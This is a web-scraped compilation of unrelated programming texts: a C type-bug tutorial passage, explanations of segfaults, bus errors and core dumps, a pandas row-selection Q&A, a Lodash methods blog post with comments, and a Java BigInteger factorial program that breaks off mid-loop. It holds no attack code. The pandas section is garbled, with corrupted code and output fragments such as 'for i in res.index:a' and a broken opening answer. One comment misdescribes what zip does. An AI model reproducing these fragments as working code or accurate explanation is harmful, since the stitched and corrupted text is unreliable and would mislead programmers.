        printf("I: 0x%04x, J: 0x%04x, C: 0x%04x\n", i, j, c);
    }
Since c is a char, it cannot hold the value 10000. It will instead hold the lowest order byte of i, which is 16 (0x10). Then when you set j to c, you'll see that j becomes 16. Make sure you understand this bug. The second bug is a typical one when you deal with math routines. If you say ``man log10,'' you'll see that it takes a double and returns a double: double log10(double x); So the following program tries to take the log of 100, which should be two:
    main() {
        double x;
        x = log10(100);
        printf("%lf\n", x);
    }
When you compile it, you have to include -lm on the linking line so that it includes the math libraries. When you do this, you'll see a weird result:
    UNIX> pd
    -1035.000000
Why? This is because you didn't include math.h in your C program, and therefore the compiler assumed that you were passing log10 an integer, and that it returned an integer. And the compiler doesn't worry about casting ints to doubles. So you get the bug. You can fix this by including math.h, as in:
    #include <math.h>
    main() {
        double x;
        x = log10(100);
        printf("%lf\n", x);
    }
    UNIX> pd
    2.000000
Finally, the following program displays another common type bug:
    main() {
        double x;
        int y;
        int z;
        x = 4000.0;
        y = 20;
        z = -17;
        printf("%d %d %d\n", x, y, z);
        printf("%f %d %d\n", x, y, z);
        printf("%lf %d %d\n", x, y, z);
        printf("%lf %lf %lf\n", x, y, z);
    }
    UNIX> pf
    1085227008 0 20
    4000.000000 20 -17
    4000.000000 20 -17
    4000.000000 0.000000 -3566985184068214263610043868633531298423160069569428047775
    20030203482592393258067630813913494098481449525958709939145371702732604277129148
    77019863534390180062158966919576508126277491063615751217181296481290794579216716
    39726032966871746925158515232719273883094320046823318866372976525388441556587623
    1667712.000000
Typically you see the first bug in line one. You try to print out a double as an int. Not only does it get the value wrong, but it gets x and y wrong as well. You'll learn why later. Lines two and three are fine, but line 4 is now wrong, because you try to print all three quantities as doubles. Again, you'll see the reason why later, but you should be aware of this kind of bug now, since you may well see it again.
Core Dump (Segmentation fault) in C/C++
Common segmentation fault scenarios (the example listings were not preserved here; sketches follow below):
- Modifying a string literal: the program may crash (gives a segmentation fault error) because the line *(str+1) = 'n' tries to write to read-only memory.
- Abnormal termination of program. Output: Segmentation fault.
- Accessing out of array index bounds. Output: Segmentation fault.
This article is contributed by Bishal Kumar Dubey.
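Minimal sketches of what such programs typically look like are below. These are reconstructions, not the article's exact listings; any one of the marked lines on its own is enough to crash on most systems.

    #include <stdio.h>

    int main(void) {
        /* 1. Modifying a string literal: str points into read-only memory,
              so the store through (str + 1) faults. */
        char *str = "GfG";
        *(str + 1) = 'n';      /* typically SIGSEGV */

        /* 2. Accessing far out of array bounds: the write lands on an
              unmapped page. */
        int arr[2];
        arr[100000] = 10;      /* undefined behaviour, often SIGSEGV */

        /* 3. Abnormal termination via a null pointer dereference. */
        int *p = NULL;
        *p = 1;                /* SIGSEGV */

        return 0;
    }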
What is a bus error? Is it different from a segmentation fault?
Minimal POSIX 7 example: "Bus error" happens when the kernel sends SIGBUS to a process. A minimal example that produces it, because ftruncate was forgotten, is sketched at the end of this entry. Tested in Ubuntu 14.04. POSIX describes SIGBUS as: Access to an undefined portion of a memory object. The mmap spec says that: References within the address range starting at pa and continuing for len bytes to whole pages following the end of an object shall result in delivery of a SIGBUS signal. And shm_open says that it generates objects of size 0: The shared memory object has a size of zero. So at that write we are touching past the end of the allocated object.
Unaligned stack memory accesses in ARMv8 aarch64: This was mentioned at "What is a bus error?" for SPARC, but here I will provide a more reproducible example. All you need is a freestanding aarch64 program that misaligns the stack pointer and then reads memory through it. That program then raises SIGBUS on Ubuntu 18.04 aarch64, Linux kernel 4.15.0, on a ThunderX2 server machine. Unfortunately, I can't reproduce it on QEMU v4.0.0 user mode, I'm not sure why. The fault appears to be optional and controlled by dedicated control-register fields; I have summarized the related docs a bit further here.
Program crash messages, tl;dr:
- segfault means the kernel says: there is something at that address, but your process may not access it
- bus error means the kernel says: that address doesn't even exist - anymore, or at all
- pointer bugs can lead to either
- ...note that specific bugs are biased to cause one or the other, due to the likeliness of hitting existing versus non-existing addresses
- (and various things can influence that likeliness, e.g. 32-bit address spaces usually being mostly or fully mapped, 64-bit not)
- abort() means the code itself says "okay, continuing running is a Bad Idea, let's stop now" - usually based on a test that should never fail.
- if you look from a distance it's much like an exit(). The largest practical differences:
- abort implies dumping core, so that you can debug this
- abort avoids calling exit handlers
- ...and the earlier this happens, the more meaningful debugging of the dumped core is. Hence the explicit test and abort.
- a fairly common case is memory allocation (as signalled by something that actually checks; not doing so is often a segfault very soon after, particularly if dereferencing null)
Segfault
Segmentation refers to the fact that processes are segmented from each other.
A segmentation fault (segfault) signals that the requested memory location exists, but the process is not allowed to do what it is trying. Which is often one of:
- the address isn't in the requesting process's currently mapped space, e.g.
- a null pointer dereference, because most OSes don't map the very start of memory to any process (mostly for this special case)
- a buffer overflow when it gets to memory outside the mapped space
- a stack overflow can cause it (though other errors may be more likely, because depending on setup it may trample all of the heap before it does)
- an attempt to write to read-only memory
A segfault is raised by hardware that supports memory protection (the MPU in most modern computers), which is caught by the kernel. The kernel then decides what to do, which in Linux amounts to sending a signal (SIGSEGV) to the originating process, where the default signal handler quits that program.
Bus error
Means the processor / memory subsystem cannot even attempt to access the memory it was asked to access. Also sent by hardware, received by the kernel, and on Linux handled by sending it SIGBUS, triggering the default signal handler. Possible causes include:
- the address does not make sense, in that it cannot possibly be there (outside of mappable addresses)
- e.g. using a random number as a pointer has a decent chance of being this or a segfault
- IO - a device became unavailable (verify)
- a device reports something is unavailable, e.g. a RAID controller refusing access to a broken drive (e.g. search for combination with "rejecting I/O to offline device")
- ...or ran out of space, e.g. when mmapping on a ram disk (verify)
- the address fails the platform's alignment requirements
- larger-than-byte units often have to be aligned to their size, e.g. 16-bit to the nearest 16-bit address
- Less likely on x86 style platforms than others (x86 is more lenient around misalignments than others)
- Theoretically rare anyway, as compilers tend to pad data that is not ideally aligned.
- cannot page in the backing memory (verify)
- e.g. a broken swap device? (verify)
- accessing a memory-mapped file that was removed
- executing a binary image that was removed (similar note as above)
In comparison to a segfault:
- similar in that it is about the address - and having a mangled or random-valued pointer could lead to either
- similar in that both are raised by the underlying hardware, that the OS sends the originating process a signal, and that the default (kernel-supplied) signal handler kills that originating process.
- differs in that a segfault means the request is valid in a mechanical way, but the requesting process may not do this operation
Aborted (core dumped)
This message comes from the default signal handler (verify) for an incoming SIGABRT. The reason for the handler is often to abort() and stop the process as soon as possible (without calling exit handlers (verify)), typically the process itself intentionally stopping/crashing as soon as possible, which is done for two good reasons:
- the sooner you do, the more meaningful the core dump is to figuring out what went wrong
- the sooner you do, the less likely you go on to do nonsense things to data (and potentially write corrupted data to persistent storage)
Ideally, this is only seen during debugging, but the latter reason is why you'd leave this in. The likeliest sources are the process itself asking for this via a failed assert(), from your own code or runtime checking from libraries, e.g.
glibc noticing double free()s, malloc() noticing overflow corruption, etc.
On core dumps
A process core dump contains (most/all? (verify)) writeable segments specific to the process, which basically means the data segment and stack segment. A core dump uses ELF format, though it seems to be a bit of a de facto thing wider than the ELF standard. By default it does not contain the text segment, which contains the code, which is why, when debugging, you also have to tell the debugger what executable was being used. It wouldn't be executable even then, since it's missing some details (entry point, CPU state). Illegal instruction means the CPU got an instruction it did not support. It can happen when executable code becomes corrupted. More commonly, though, it comes from programs being compiled with very specific optimizations within the wider platform they are part of. Most programs are compiled to avoid this ever happening, by being conservative about what they will be run on, which is what compilers and code default to. But when you e.g. compile for instructions that were recently introduced, omit fallbacks (e.g. via intrinsics), and run it on an older CPU, you'll get this. For example, some recent tensorflow builds just assume your CPU has AVX instructions, which didn't exist in any CPUs from before 2011[2] and still don't in some lower-end x86 CPUs (Pentium, Celeron, Atom).
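For reference, the "minimal POSIX example" mentioned earlier lost its listing in this copy. The idea is a shared-memory object that is mapped but never grown with ftruncate, so the very first store lands past the end of a zero-length object and the kernel delivers SIGBUS. A sketch along those lines (the object name and sizes are placeholders):

    #include <fcntl.h>
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <unistd.h>

    int main(void) {
        int fd = shm_open("/sigbus_demo", O_RDWR | O_CREAT, S_IRUSR | S_IWUSR);
        /* ftruncate(fd, sizeof(int)); <-- deliberately "forgotten" */
        int *map = mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE,
                        MAP_SHARED, fd, 0);
        *map = 0;   /* write past the end of the zero-length object: SIGBUS */
        return 0;
    }

Built with something like cc main.c -lrt and run on Linux, this should terminate with "Bus error (core dumped)"; putting the ftruncate call back makes the store legal and the program exits normally.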
https://sprers.eu/bus-error-core-dumped-c-programming.php
CC-MAIN-2022-40
en
refinedweb
Sample problem: How can I select rows from a DataFrame based on values in some column in Pandas? In SQL, I would use: SELECT * FROM table WHERE colume_name = some_value I tried to look at Pandas’ documentation, but I did not immediately find the answer. How to select rows from a DataFrame based on column values? Answer which results in a Truth value of a Series is an ambiguous error. Answer #2: There are several ways to select rows from a Pandas dataframe: - Boolean indexing ( df[df['col'] == value] ) - Positional indexing ( df.iloc[...]) - Label index: import pandas as pd, numpy as np df = pd.DataFrame({'A': 'foo bar foo bar foo bar foo foo'.split(), 'B': 'one one two three two two one three'.split(), 'C': np.arange(8), 'D': np.arange(8) * 2}). mask = df['A'] == 'foo' We can then use this mask to slice or index the data frame df[mask] A B C D 0 foo one 0 0 2 foo two 2 4 4 foo two 4 8 6 foo one 6 12 7 foo three 7 14. mask = df['A'] == 'foo' pos = np.flatnonzero(mask) df.iloc[pos] A B C D 0 foo one 0 0 2 foo two 2 4 4 foo two 4 8 6 foo one 6 12 7 foo three 7 14 3. Label indexing Label indexing can be very handy, but in this case, we are again doing more work for no benefit df.set_index('A', append=True, drop=False).xs('foo', level=1) A B C D 0 foo one 0 0 2 foo two 2 4 4 foo two 4 8 6 foo one 6 12 7 foo three 7 14 4. df.query() API pd.DataFrame.query is a very elegant/intuitive way to perform this task, but is often slower. However, if you pay attention to the timings below, for large data, the query is very efficient. More so than the standard approach and of similar magnitude as my best suggestion. df.query('A == "foo"') A B C D 0 foo one 0 0 2 foo two 2 4 4 foo two 4 8 6 foo one 6 12 7 foo three 7 14 My preference is to use the Boolean mask Actual improvements can be made by modifying how we create our Boolean mask. mask alternative 1 Use the underlying NumPy array and forgo the overhead of creating another pd.Series mask = df['A'].values == 'foo' I’ll show more complete time tests at the end, but just take a look at the performance gains we get using the sample data frame. First, we look at the difference in creating the mask %timeit mask = df['A'].values == 'foo' %timeit mask = df['A'] == 'foo' 5.84 µs ± 195 ns per loop (mean ± std. dev. of 7 runs, 100000 loops each) 166 µs ± 4.45 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each) Evaluating the mask with the NumPy array is ~ 30 times faster. This is partly due to NumPy evaluation often being faster. It is also partly due to the lack of overhead necessary to build an index and a corresponding pd.Series object. Next, we’ll look at the timing for slicing with one mask versus the other. mask = df['A'].values == 'foo' %timeit df[mask] mask = df['A'] == 'foo' %timeit df[mask] 219 µs ± 12.3 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) 239 µs ± 7.03 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) The performance gains aren’t as pronounced. We’ll see if this holds up over more robust testing. mask alternative 2 We could have reconstructed the data frame as well. There is a big caveat when reconstructing a dataframe—you must take care of the dtypes when doing so! Instead of df[mask] we will do this pd.DataFrame(df.values[mask], df.index[mask], df.columns).astype(df.dtypes) If the data frame is of mixed type, which our example is, then when we get df.values the resulting array is of dtype object and consequently, all columns of the new data frame will be of dtype object. 
Thus requiring the astype(df.dtypes) and killing any potential performance gains. %timeit df[m] %timeit pd.DataFrame(df.values[mask], df.index[mask], df.columns).astype(df.dtypes) 216 µs ± 10.4 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) 1.43 ms ± 39.6 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) However, if the data frame is not of mixed type, this is a very useful way to do it. Given np.random.seed([3,1415]) d1 = pd.DataFrame(np.random.randint(10, size=(10, 5)), columns=list('ABCDE')) d1 A B C D E 0 0 2 7 3 8 1 7 0 6 8 6 2 0 2 0 4 9 3 7 3 2 4 3 4 3 6 7 7 4 5 5 3 7 5 9 6 8 7 6 4 7 7 6 2 6 6 5 8 2 8 7 5 8 9 4 7 6 1 5 %%timeit mask = d1['A'].values == 7 d1[mask] 179 µs ± 8.73 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each) Versus %%timeit mask = d1['A'].values == 7 pd.DataFrame(d1.values[mask], d1.index[mask], d1.columns) 87 µs ± 5.12 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each) We cut the time in half. mask alternative 3 @unutbu also shows us how to use pd.Series.isin to. mask = df['A'].isin(['foo']) df[mask] A B C D 0 foo one 0 0 2 foo two 2 4 4 foo two 4 8 6 foo one 6 12 7 foo three 7 14 However, as before, we can utilize NumPy to improve performance while sacrificing virtually nothing. We’ll use np.in1d mask = np.in1d(df['A'].values, ['foo']) df[mask] A B C D 0 foo one 0 0 2 foo two 2 4 4 foo two 4 8 6 foo one 6 12 7 foo three 7 14. res.div(res.min()) 10 30 100 300 1000 3000 10000 30000 mask_standard 2.156872 1.850663 2.034149 2.166312 2.164541 3.090372 2.981326 3.131151 mask_standard_loc 1.879035 1.782366 1.988823 2.338112 2.361391 3.036131 2.998112 2.990103 mask_with_values 1.010166 1.000000 1.005113 1.026363 1.028698 1.293741 1.007824 1.016919 mask_with_values_loc 1.196843 1.300228 1.000000 1.000000 1.038989 1.219233 1.037020 1.000000 query 4.997304 4.765554 5.934096 4.500559 2.997924 2.397013 1.680447 1.398190 xs_label 4.124597 4.272363 5.596152 4.295331 4.676591 5.710680 6.032809 8.950255 mask_with_isin 1.674055 1.679935 1.847972 1.724183 1.345111 1.405231 1.253554 1.264760 mask_with_in1d 1.000000 1.083807 1.220493 1.101929 1.000000 1.000000 1.000000 1.144175 You’ll notice that the fastest times seem to be shared between mask_with_values and mask_with_in1d. res.T.plot(loglog=True) Functions def mask_standard(df): mask = df['A'] == 'foo' return df[mask] def mask_standard_loc(df): mask = df['A'] == 'foo' return df.loc[mask] def mask_with_values(df): mask = df['A'].values == 'foo' return df[mask] def mask_with_values_loc(df): mask = df['A'].values == 'foo' return df.loc[mask] def query(df): return df.query('A == "foo"') def xs_label(df): return df.set_index('A', append=True, drop=False).xs('foo', level=-1) def mask_with_isin(df): mask = df['A'].isin(['foo']) return df[mask] def mask_with_in1d(df): mask = np.in1d(df['A'].values, ['foo']) return df[mask] Testing res = pd.DataFrame( index=[ 'mask_standard', 'mask_standard_loc', 'mask_with_values', 'mask_with_values_loc', 'query', 'xs_label', 'mask_with_isin', 'mask_with_in1d' ], columns=[10, 30, 100, 300, 1000, 3000, 10000, 30000], dtype=float ) for j in res.columns: d = pd.concat([df] * j, ignore_index=True) for i in res.index:a stmt = '{}(d)'.format(i) setp = 'from __main__ import d, {}'.format(i) res.at[i, j] = timeit(stmt, setp, number=50) Special Timing Looking at the special case when we have a single non-object dtype for the entire data frame. 
Code Below spec.div(spec.min()) 10 30 100 300 1000 3000 10000 30000 mask_with_values 1.009030 1.000000 1.194276 1.000000 1.236892 1.095343 1.000000 1.000000 mask_with_in1d 1.104638 1.094524 1.156930 1.072094 1.000000 1.000000 1.040043 1.027100 reconstruct 1.000000 1.142838 1.000000 1.355440 1.650270 2.222181 2.294913 3.406735 Turns out, reconstruction isn’t worth it past a few hundred rows. spec.T.plot(loglog=True) Functions np.random.seed([3,1415]) d1 = pd.DataFrame(np.random.randint(10, size=(10, 5)), columns=list('ABCDE')) def mask_with_values(df): mask = df['A'].values == 'foo' return df[mask] def mask_with_in1d(df): mask = np.in1d(df['A'].values, ['foo']) return df[mask] def reconstruct(df): v = df.values mask = np.in1d(df['A'].values, ['foo']) return pd.DataFrame(v[mask], df.index[mask], df.columns) spec = pd.DataFrame( index=['mask_with_values', 'mask_with_in1d', 'reconstruct'], columns=[10, 30, 100, 300, 1000, 3000, 10000, 30000], dtype=float ) Testing for j in spec.columns: d = pd.concat([df] * j, ignore_index=True) for i in spec.index: stmt = '{}(d)'.format(i) setp = 'from __main__ import d, {}'.format(i) spec.at[i, j] = timeit(stmt, setp, number=50) Answer #3: The Pandas equivalent to select * from table where column_name = some_value is table[table.column_name == some_value] Multiple conditions: table[(table.column_name == some_value) | (table.column_name2 == some_value2)] or table.query('column_name == some_value | column_name2 == some_value2') Code example import pandas as pd # Create data set d = {'foo':[100, 111, 222], 'bar':[333, 444, 555]} df = pd.DataFrame(d) # Full dataframe: df # Shows: # bar foo # 0 333 100 # 1 444 111 # 2 555 222 # Output only the row(s) in df where foo is 222: df[df.foo == 222] # Shows: # bar foo # 2 555 222 In the above code it is the line df[df.foo == 222] that gives the rows based on the column value, 222 in this case. Multiple conditions are also possible: df[(df.foo == 222) | (df.bar == 444)] # bar foo # 1 444 111 # 2 555 222 But at that point I would recommend using the query function, since it’s less verbose and yields the same result: df.query('foo == 222 | bar == 444') Answer #4: I find the syntax of the previous answers to be redundant and difficult to remember. Pandas introduced the query() method in v0.13 and I much prefer it. For your question, you could do df.query('col == val') Reproduced.303746 8 0.116822 0.364564 0.454607 9 0.986142 0.751953 0.561512 # pure python In [170]: df[(df.a < df.b) & (df.b < df.c)] Out[170]: a b c 3 0.011763 0.022921 0.244186 8 0.116822 0.364564 0.454607 # query In [171]: df.query('(a < b) & (b < c)') Out[171]: a b c 3 0.011763 0.022921 0.244186 8 0.116822 0.364564 0.454607 You can also access variables in the environment by prepending an @. exclude = ('red', 'orange') df.query('color not in @exclude') Answer #5: More flexibility using .query with pandas >= 0.25.0: August 2019 updated answer Since pandas >= 0.25.0 we can use the query method to filter dataframes with pandas methods and even column names that have spaces. 
Normally the spaces in column names would give an error, but now we can solve that using a backtick (`) – see GitHub: # Example dataframe df = pd.DataFrame({'Sender email':['[email protected]', "[email protected]", "[email protected]"]}) Sender email 0 [email protected] 1 [email protected] 2 [email protected] Using .query with method str.endswith: df.query('`Sender email`.str.endswith("@shop.com")') Output Sender email 1 [email protected] 2 [email protected] Also we can use local variables by prefixing it with an @ in our query: domain = 'shop.com' df.query('`Sender email`.str.endswith(@domain)') Output Sender email 1 [email protected] 2 [email protected] Hope you learned something from this post. Follow Programming Articles for more!
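Pulling the answers together, here is a compact side-by-side sketch of the main selection idioms discussed above, using the same example frame. It is a summary for reference, not a replacement for the timing comparisons shown earlier.

    import pandas as pd
    import numpy as np

    df = pd.DataFrame({'A': 'foo bar foo bar foo bar foo foo'.split(),
                       'B': 'one one two three two two one three'.split(),
                       'C': np.arange(8), 'D': np.arange(8) * 2})

    # 1. Boolean mask (the usual starting point)
    print(df[df['A'] == 'foo'])

    # 2. The same mask built on the raw NumPy array (often a little faster)
    print(df[df['A'].values == 'foo'])

    # 3. Membership tests with isin / in1d
    print(df[df['A'].isin(['foo'])])
    print(df[np.in1d(df['A'].values, ['foo'])])

    # 4. query(), including a local variable referenced with @
    wanted = 'foo'
    print(df.query('A == @wanted'))

    # 5. Combining conditions: use & / | with parentheses, not and / or
    print(df[(df['A'] == 'foo') & (df['B'] == 'one')])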
https://programming-articles.com/how-to-select-rows-from-a-dataframe-based-on-column-values-pandas-answered/
CC-MAIN-2022-40
en
refinedweb
Lodash is a JavaScript utility library that helps you work with arrays, objects, and strings, and just write fewer functions in general. Let's talk Lodash and some of its most useful methods!
1.) _.get()
The _.get() method can help us find an element in an object. If an element is not found at the specified path, we can specify a default value for the _.get() method to return.
    const foodObj = {
      favFoods: [
        "Pizza",
        "Chicken Nuggets",
        "Lasagna",
        { favCandy: "Sour Boys Candy" },
      ],
    };
    // We will use the _.get() method to find my favorite candy.
    const myFavCandy = _.get(foodObj, 'favFoods[3].favCandy', 'Chocolate')
    // myFavCandy => "Sour Boys Candy"
    console.log(myFavCandy)
A few things to notice here:
- The _.get() method can receive three arguments, the first being the object we want to get an element from. The second is the path. The third is the default we want to return if an element was not found.
- The path to the element is a string.
- The default returned value can be any data type (object, string, number, null, etc).
- By default, the _.get() method will return undefined if an element was unable to be found.
2.) _.find()
You might think that the _.find() method is similar to the _.get() method, and yes, they will both return a value we are looking for, but there are a few key differences that are important to understand. Let's first take a look at the _.find() method. The _.find() method will iterate over an object or an array and return the first element for which the callback returns true.
    const myNewBestFirend = _.find(
      adoptableDogs,
      // This function will be called on every iteration.
      (obj) => obj.breed === "White Lab" && obj.age > 2,
      2
    );
    // myNewBestFirend => { name: 'Snowflake', age: 3, breed: 'White Lab' }
    console.log(myNewBestFirend);
Kinda cool right? We should talk about those differences though.
- The _.find() method also takes three arguments, but unlike the _.get() method, the first argument can be an array or an object.
- The second argument is the function that will fire on every iteration. I used a function in the example above to help solidify this concept. This is important to understand and hopefully helps demonstrate the possibilities.
- The third argument is the starting index of the collection. Since the _.find() method iterates over every element in a collection, performance is something to think about with large data sets/collections. You can specify a starting index for the _.find() method to start its search at.
3.) _.map()
The _.map() method will iterate over a collection (array, object) and return a new array based on the return value of the function called on each iteration. Let's take a peek. The _.map() method will iterate over the adoptableDogs array and return a new array with all of the dogs' names.
    const adoptableDogsNames = _.map(adoptableDogs, (dog) => dog.name);
    // adoptableDogsNames => [ 'Rex', 'Sundance', 'Milo', 'Snowflake', 'Chip', 'Bolt' ]
    console.log(adoptableDogsNames);
As you can see, the _.map() method returns a new array with just the dogs' names as the elements in the array.
4.) _.set()
The _.set() method is the opposite of the _.get() method. It will set the value of an element at a specified path. The first argument is the object or array, the second is the path, and the third is the value you desire to set.
    // Sets the age of the dog at the second index of the adoptableDogs array to 1.
    _.set(adoptableDogs, "[2].age", 1);
    // adoptableDogs[2] => { name: 'Milo', age: 1, breed: 'Husky' }
    console.dir(adoptableDogs[2]);
5.)
_.debounce() This is one of the most powerful lodash methods in my opinion. It can also be very hard to understand what it does and when you might want to use it. The _.debounce() method will return a function. The function returned by the _.debounce() method will delay its invocation until a specified number of milliseconds has elapsed since the last time the function was invoked. Let's say you were listening to a DOM event (scroll, resize, etc) or API/Webhook route, the event or API may be called multiple times a day or even second. Now let's say you only want to run the function once every 24 hours even if the event or API is called multiple times a second, this is where a debounced function would help. Let's take a peek at the code! const updateData = _.debounce( () => { // Code here! We might update some kind of data that might need to be updated once a day. console.log("Went and grabbed some new data"); }, 1000 * 60 * 60 * 24, // 1 Day Timeout { // defines if the invocation of the function is on the trailing or leading edge of the timeout. leading: true, trailing: false, } ); // We can call the function returned by the _.debounce method. updateData(); Conclusion Lodash is a very helpful utility library, and it has a bunch of helpful methods! We have just barely scraped the surface of lodash in this post. If you would like to know more about the _.debounce method and take a deeper dive into it, check out this blog post by David Corbacho - Debouncing and Throttling Explained Through Examples You can also follow me on GitHub, Youtube, and Twitter. Top comments (27) I'm confused - most, if not all of the examples above can be achieved using less code in plain JS - without the overhead of a library. Using plain JS will also be faster. The debounce one is quite useful, but again - easy to write yourself instead of including a whole library 1. 2. 3. 4. No 72.5Kb of lodasheven remotely required In general for this simple cases yes you don't need lodash, but in more real complex applications is simplify many things especially the chaining. For example in 1 and 4 when you don't know in compile time the "path", but is something that is user/api/external input how you are going to do it ? One other thing that I like in lodash is the internal error checking and handling. For example the 2 and 3 example if the adoptableDogs is null/undefined the code is going to get exception, you need to check it before use it. The lodash is going to return empty array in map and null in find, a consistent result that you don't need to have special check or path in your code flow. I agree. I was merely pointing out that these were poor examples, that do not really give any idea of why, and in what situations Lodash can be beneficial Some points: setsafely gives you a new object (not deep clone, but property copy) Promise, your own composition, or the new pipeline operator, you end up wrapping all this stuff. So, the writer's example for number 4 then does not even work? The way the example is written implies mutation. This adds even more weight to my contention that these are poor Lodash examples No it works, he imported map form lodash, not lodash/fp. Most people when starting to learn will start with Lodash, and that works great for many years. Those who want curry first, data last style coding can use lodash/fp when they are ready (if they want, no pressure). All the same imports, but the parameter order is usually reversed. 
Ah ok, your comments were referencing a functional version of Lodash Sort of, it's kind of confusing and frustrating. Like, Lodash makes it pretty clear some methods mutate the original Array/Object, while others return shallow copies. You'd assume the FP version would, but that's not always the case, so... it's kind of FP, which is better than nothing; at least they document it. For things like set, though, thankfully, they work the same in both lodash and lodash/fp; it returns a "new"ish Object without mutation. So the writer's example doesn't work Why you gotta be a troll, man? Guy is just trying to show how cool Lodash is. Not trolling. His examples don't show how good Lodash is, and - as we've established - the fourth example doesn't work if what you said about setnot mutating is correct All those "modern JS" native methods did not exist when Lodash was first conceptualized.... You are not wrong! Lodash has a bunch of methods that just make doing certain tasks easier. Adding Lodash to your Javascript project adds these methods some other frameworks like Django or Ruby on Rails would have out of the box. Such as the zip method in Ruby on Rails which will zip together two arrays into one. Javascript doesn't have this functionality out of the box... Lodash has a _.zip method. Don't get me wrong you could also do this with the array .map method in Javascript. As for the library overhead you could always import each method individually. Ex. const zip = require("lodash/zip"); You certainly should only import the modules you use, otherwise a few convenience methods are taking up more space than whole frameworks like React. Functions such as debounce()in lodash have tons of options that make them much heavier than lightweight implementations (which are mostly what it is used for) - if you aren't using the options for trailing and leading edges, it's costing "something". For me in big apps that are likely to use lots of utility methods over time, I'd take Sugar.js because that has some really useful functions - like Date.create("Next monday at 2pm"), debounce etc. It's also 1/3 the size of lodash if you include it all (and you don't have to). Probably would have been better to show examples of where using Lodash would actually have some benefit Maybe in my next post! 😉 say tuned lol! 'Tuned' I see what you did there 👀 I don't know anything about ruby on rails but isn't that concat? w3schools.com/jsref/jsref_concat_a... It's a little different concat would join the two arrays. So if you had [1, 3, 5] and [2, 4]. The results of concatenation would be [1, 3, 5, 2, 4]. The zip method would zip the two arrays together like a zipper. The results would look like this [1, 2, 3, 4, 5] So basically concat + sort? I think you have a point especially on the client - downloading dozens of extra KB's is not a good idea unless it's really necessary ... server side (node.js) this is less of an issue. Recommendation: Do not use Lodash in current year. Like others here have pointed out, It is a literal waste of kb's in your payload. :) well, import { debounce } from 'lodash';kinda takes your argument away (there are even separate packages for everything). also, in past years I'd been writing my own debounce function in every project, it isn't that a complex mechanism. I'm not that foolish any more. the lodash's version is superior and documented. and that's gist of it. debouncing is not Lodash tho, it’s part of the library by practical coincidence. It could also be a separate package like you point out. 
Lodash was made in an age when array methods where lacking and polyfiling was less common. If they changed the focus of the library, then I did not get the memo. :) in Lodash, I use debounce and cloneDeep most :)
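For readers weighing the thread above, rough plain-JS counterparts of the article's examples might look like this. This is a sketch: optional chaining and nullish coalescing need a reasonably modern runtime, and the debounce shown is the bare-bones version without lodash's leading/trailing options.

    // _.get(foodObj, 'favFoods[3].favCandy', 'Chocolate')
    const myFavCandy = foodObj.favFoods?.[3]?.favCandy ?? 'Chocolate';

    // _.find(adoptableDogs, d => d.breed === 'White Lab' && d.age > 2)
    const myNewBestFriend = adoptableDogs.find(d => d.breed === 'White Lab' && d.age > 2);

    // _.map(adoptableDogs, d => d.name)
    const adoptableDogsNames = adoptableDogs.map(d => d.name);

    // A minimal debounce without leading/trailing options
    function debounce(fn, wait) {
      let timer;
      return function (...args) {
        clearTimeout(timer);
        timer = setTimeout(() => fn.apply(this, args), wait);
      };
    }

Whether these are "enough" is exactly the trade-off the commenters are debating: the native forms are lighter, while the lodash versions add null-safety, consistent return values, and extra options.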
https://dev.to/camskithedev/5-must-know-lodash-methods-4g6p
CC-MAIN-2022-40
en
refinedweb
To calculate the factorial of a large number you first need a way to store a really large integer value, something which is even bigger than the maximum value of the long primitive, i.e. 2^63 - 1 or 9223372036854775807L. You also need to change the way you calculate the factorial of a smaller number: you cannot use recursion to calculate the factorial of a larger number; instead we need to use a for loop for that. Also worth noting is that, similar to java.lang.String and other wrapper classes, BigInteger is also immutable in Java, which means it's important to store the result back into the same variable, otherwise the result of the calculation will be lost. BigInteger stores numbers as 2's complement numbers like the int primitive and supports the operations supported by int variables and all relevant methods from java.lang.Math. Additionally, it also provides support for modular arithmetic, bit manipulation, primality testing, prime generation, GCD calculation, and other miscellaneous operations. Also, basic knowledge of essential Java concepts and API is very important, and that's why I suggest all Java programmers join a comprehensive Java online course like The Complete Java Masterclass on Udemy to improve their Java knowledge and API skills.
Java Program to Calculate Factorial of a Large Number
Here is our sample Java program to calculate factorial for large numbers. Well, the given number is not exactly large, but the factorial value is definitely large. For example, the factorial of 45 is 119622220865480194561963161495657715064383733760000000000, which is clearly out of bounds for even a long data type. Since theoretically BigInteger has no limit, it can hold these values, as shown in the following example. You will also notice that instead of recursion, we have used iteration to calculate the factorial in Java.
    import java.math.BigInteger;

    /**
     * Write a Java program to calculate factorial of large numbers using
     * BigInteger.
     *
     * @author WINDOWS 8
     */
    public class LargeFactorialDemo {

        public static void main(String args[]) {
            System.out.printf("Factorial of 32 is %s %n", factorial(32));
            System.out.printf("Factorial of 0 is %s %n", factorial(0));
            System.out.printf("Factorial of 1 is %s %n", factorial(1));
            System.out.printf("Factorial of 5 is %s %n", factorial(5));
            System.out.printf("Factorial of 41 is %s %n", factorial(41));
            System.out.printf("Factorial of 45 is %s %n", factorial(45));
        }

        /*
         * Java method to calculate factorial of a large number
         * @return BigInteger factorial of given number
         */
        public static BigInteger factorial(int number) {
            BigInteger factorial = BigInteger.ONE;
            for (int i = number; i > 0; i--) {
                factorial = factorial.multiply(BigInteger.valueOf(i));
            }
            return factorial;
        }
    }

    Output
    Factorial of 32 is 263130836933693530167218012160000000
    Factorial of 0 is 1
    Factorial of 1 is 1
    Factorial of 5 is 120
    Factorial of 41 is 33452526613163807108170062053440751665152000000000
    Factorial of 45 is 119622220865480194561963161495657715064383733760000000000
You can see how large the factorial of 45 is; clearly it's not possible to use a long data type to store such huge integral values. You need to use the BigInteger class to store such big values. BTW, if you are looking for some programming exercises to prepare for coding interviews or to develop your programming logic, then you should check problems from Cracking the Coding Interview: 189 Programming Questions and Solutions, one of the best books for preparing coding interviews.
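To see why the switch to BigInteger is necessary in the first place, here is a small sketch (not from the original post) showing the long-based version silently overflowing at 21!:

    public class FactorialOverflowDemo {
        public static void main(String[] args) {
            long factorial = 1L;
            for (int i = 1; i <= 25; i++) {
                factorial *= i;
                if (i >= 20) {
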